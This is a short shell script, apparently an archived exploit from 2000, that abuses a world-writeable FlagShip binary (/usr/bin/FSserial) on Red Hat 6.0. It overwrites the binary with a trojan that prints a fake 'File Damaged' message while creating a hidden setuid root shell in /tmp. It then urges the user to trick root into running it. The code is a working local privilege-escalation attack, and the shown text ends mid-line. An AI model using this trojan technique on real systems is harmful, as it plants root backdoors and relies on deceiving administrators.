#!/bin/sh
#
# Program Description:
#   FlagShip (from Red Hat Application CD) is a Database Development System
#   for xBase based applications on nearly all Unix brands.
#
# Problem:
#   /usr/bin/FSserial is world-writeable! We can replace it with an
#   trojan and trick root to execute it.
#
# System Vulnerable: Red Hat 6.0
#
# fi.sh (lame) (half)exploit by Narrow


if [ ! -f /usr/bin/FSserial ]; then
    echo "Error: File /usr/bin/FSserial doesn't exist!";
    exit 1
fi

if [ ! -w /usr/bin/FSserial ]; then
    echo "Error: /usr/bin/FSserial not world writeable!";
    exit 1
fi

echo -n "Backup of FSserial (/tmp/fs.bak) ... "
cp /usr/bin/FSserial /tmp/fs.bak
echo "OK"; echo

echo -n "Trojaning FSserial ... "
echo "#!/bin/sh" >/usr/bin/FSserial ; echo >>/usr/bin/FSserial
echo "echo File Damaged" >>/usr/bin/FSserial
echo "cp /bin/sh /tmp/.root.mail" >>/usr/bin/FSserial
echo "chmod 4755 /tmp/.root.mail" >>/usr/bin/FSserial
echo "OK"; echo

echo "FSserial is now trojaned. Now it's your turn to trick"
echo "root
#                   www.hack.co.za   [27 September 2000]#